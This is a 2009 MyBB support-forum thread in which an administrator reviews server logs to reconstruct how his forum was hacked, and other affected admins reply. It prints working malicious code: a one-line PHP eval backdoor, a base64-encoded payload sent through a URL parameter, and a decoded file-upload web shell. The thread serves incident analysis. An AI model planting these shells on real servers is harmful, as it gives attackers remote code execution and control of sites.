MyBB Community Forums

Hi there! As I mentioned here earlier today, my forum got hacked, because I did not upgrade in time.

If you don't mind, I wanna have a closer look at what happened here, using the server's logfile. Maybe you can help me understand the steps the hacker took.

First, the user found the forum via the copyright bit and Yahoo:

94.101.131.240 www.mysite.org - [01/Jul/2009:10:53:11 +0200] "GET /forum/archive/index.php HTTP/1.1" 200 2776 "http://search.yahoo.com/search?p="powered+by+mybb"+site:de&y=Search&fr=sfp&fr2=sb-top&xargs=0&pstart=1&b=1&xa=vNWg0lcwjpUdScW1_BEtoQ--,1246558928" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"

Next he went to the root of the forum and also called task.php. I don't really know what task.php is for at all. Maybe you can explain?

94.101.131.240 www.mysite.org - [01/Jul/2009:10:53:39 +0200] "GET /forum/ HTTP/1.1" 200 4167 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:53:45 +0200] "GET /forum/task.php HTTP/1.1" 200 54 "http://www.mysite.org/forum/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"

Now he registered. He had to do this, because the 1.4.6 vulnerability is in the user profile edit page (as far as I understood the patch)

94.101.131.240 www.mysite.org - [01/Jul/2009:10:53:47 +0200] "GET /forum/member.php?action=register HTTP/1.1" 200 3170 "http://www.mysite.org/forum/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:53:48 +0200] "GET /forum/task.php HTTP/1.1" 200 54 "http://www.mysite.org/forum/member.php?action=register" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:54:14 +0200] "POST /forum/member.php HTTP/1.1" 200 4589 "http://www.mysite.org/forum/member.php?action=register" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"

94.101.131.240 www.mysite.org - [01/Jul/2009:10:54:15 +0200] "GET /forum/jscripts/captcha.js?ver=1400 HTTP/1.1" 200 1352 "http://www.mysite.org/forum/member.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:54:16 +0200] "GET /forum/captcha.php?action=regimage&imagehash=389a7312e4187f4e30a680a47ba28ff3 HTTP/1.1" 200 16918 "http://www.mysite.org/forum/member.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"

94.101.131.240 www.mysite.org - [01/Jul/2009:10:54:17 +0200] "GET /forum/task.php HTTP/1.1" 200 54 "http://www.mysite.org/forum/member.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"

94.101.131.240 www.mysite.org - [01/Jul/2009:10:54:29 +0200] "POST /forum/xmlhttp.php?action=username_availability HTTP/1.1" 200 49 "http://www.mysite.org/forum/member.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:54:35 +0200] "POST /forum/member.php HTTP/1.1" 200 1035 "http://www.mysite.org/forum/member.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:54:36 +0200] "POST /forum/xmlhttp.php?action=validate_captcha HTTP/1.1" 200 100 "http://www.mysite.org/forum/member.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:54:38 +0200] "GET /forum/index.php HTTP/1.1" 200 4363 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"

94.101.131.240 www.mysite.org - [01/Jul/2009:10:54:39 +0200] "GET /forum/task.php HTTP/1.1" 200 54 "http://www.mysite.org/forum/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"

At this moment, the hacker switches browsers. He uses "Flock". Never heard of it before and I don't know why he switched. Maybe you've got an idea?

94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:08 +0200] "POST /forum//member.php HTTP/1.1" 200 2369 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008121620 Firefox/3.0.5 Flock/2.0.3"

He's messing around in the user control panel. Logs don't really tell what he did there, but I guess he injected something into the birthday field:

94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:08 +0200] "GET /forum//usercp.php?action=profile HTTP/1.1" 200 19208 "http://www.mysite.org/forum//member.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008121620 Firefox/3.0.5 Flock/2.0.3"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:10 +0200] "POST /forum//member.php HTTP/1.1" 200 5 "http://www.mysite.org/forum//usercp.php?action=profile" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008121620 Firefox/3.0.5 Flock/2.0.3"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:11 +0200] "POST /forum//usercp.php HTTP/1.1" 200 2487 "http://www.mysite.org/forum//usercp.php?action=profile" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008121620 Firefox/3.0.5 Flock/2.0.3"

Now he tries to access the Admin-panel. I don't think that worked, for his user account was no admin, of course. Don't know why he did this. Just another attempt? That would be most interesting.

94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:12 +0200] "POST /forum///admin//index.php HTTP/1.1" 200 7049 "http://www.mysite.org/forum//usercp.php?action=profile" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008121620 Firefox/3.0.5 Flock/2.0.3"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:13 +0200] "POST /forum///admin//index.php?module=config/mycode&action=xmlhttp_test_mycode HTTP/1.1" 200 5 "http://www.mysite.org/forum///admin//index.php?module=config/mycode&action=edit&cid=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008121620 Firefox/3.0.5 Flock/2.0.3"

Now he accesses themes.php in the cache/themes subfolder. This file doesn't belong to MyBB, so he created it in one of the prior steps. Can you tell me which one?

94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:17 +0200] "GET /forum///cache/themes/themes.php HTTP/1.1" 200 19 "-" "-"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:18 +0200] "POST /forum//usercp.php HTTP/1.1" 200 2487 "http://www.mysite.org/forum//usercp.php?action=profile" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008121620 Firefox/3.0.5 Flock/2.0.3"

themes.php looks like this:

<?PHP if (isset($_REQUEST[x])) eval(stripslashes($_REQUEST[x])); ?>

Now he inserted a base64 encoded string which created the file last.php. That's also in cache/themes.

94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:19 +0200] "GET /forum//cache/themes/themes.php?x=eval(base64_decode(%22JGEgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNpUnRjMmNnUFNCamIzQjVLQ1JmUmtsTVJWTmJhR0Z0WW1GelhWdDBiWEJmYm1GdFpWMHNKRjlHU1V4RlUxdG9ZVzFpWVhOZFcyNWhiV1ZkS1NBL0lDSjNiM0pyY3lJZ09pQWlibTkwZDI5eWEzTWlPdzBLWldOb2J5QWtYMFpKVEVWVFcyaGhiV0poYzExYmJtRnRaVjA3RFFwbFkyaHZJQ1J0YzJjN0RRby9QZzBLUEdadmNtMGdSVTVEVkZsUVJUMGliWFZzZEdsd1lYSjBMMlp2Y20wdFpHRjBZU0lnUVVOVVNVOU9QU0lpSUUxRlZFaFBSRDBpVUU5VFZDSStJQTBLUEdsdWNIVjBJRTVCVFVVOUltaGhiV0poY3lJZ1ZGbFFSVDBpWm1sc1pTSStJQTBLUEdsdWNIVjBJRlpCVEZWRlBTSnpkV0p0YVhRaUlGUlpVRVU5SW5OMVltMXBkQ0krUEM5bWIzSnRQZz09Iik7JGZwID0gZm9wZW4oImxhc3QucGhwIiwgJ3crJyk7ZndyaXRlKCRmcCwgJGEpO2ZjbG9zZSgkZnApOw%22)); HTTP/1.1" 200 5 "http://www.mysite.org/forum//usercp.php?action=profile" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008121620 Firefox/3.0.5 Flock/2.0.3"

The base64 encoded stuff and the content of last.php reads like this:

<?php
$msg = copy($_FILES[hambas][tmp_name],$_FILES[hambas][name]) ? "works" : "notworks";
echo $_FILES[hambas][name];
echo $msg;
?>
<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST"> 
<input NAME="hambas" TYPE="file"> 
<input VALUE="submit" TYPE="submit"></form>

For some reason, he now switches back to normal Firefox and accesses the newly created file, which now fetches another, big PHP file, called inc.php.

94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:29 +0200] "GET /forum//cache/themes/last.php HTTP/1.1" 200 161 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:54 +0200] "POST /forum//cache/themes/last.php HTTP/1.1" 200 175 "http://www.mysite.org/forum//cache/themes/last.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"

The rest of his accesses is on /forum//cache/themes/inc.php, where he can see and delete everything that PHP can.
inc.php is a 250 kbyte hacking tool.


Do you have any explanations for the stuff that I don't understand? Thankyou!!

And keep up the good work!

I just got hacked as well, hella ton of files in the 'cache/themes' folder.

And I was running 1.4.8 =[

It happened when you were on 1.4.8?? Did you upload all the correct files??

I got hacked too
with mybb 1.4.5

Now how can fix the problem?
I have reupload everything but still not working

Updating to the latest version now won't magically fix the problem....

Check to see if there's anything in your ./cache/themes/ folder that shouldn't be there.

Well that was educational

Yes I had properly upgraded. I've been doing this since MyBB gold was released.

(2009-07-01, 06:17 PM)compwhizii Wrote: [ -> ]Well that was educational

Still there are some interesting questions left.

http://zone-h.org/archive/defacer=NobodyCoder/page=1

There, you can see all the mybb installs that have been hacked in the past two days. Good news, looks like less than 100. Maybe? :o

I changed theme and the Iranian president gone

And the guy become administrator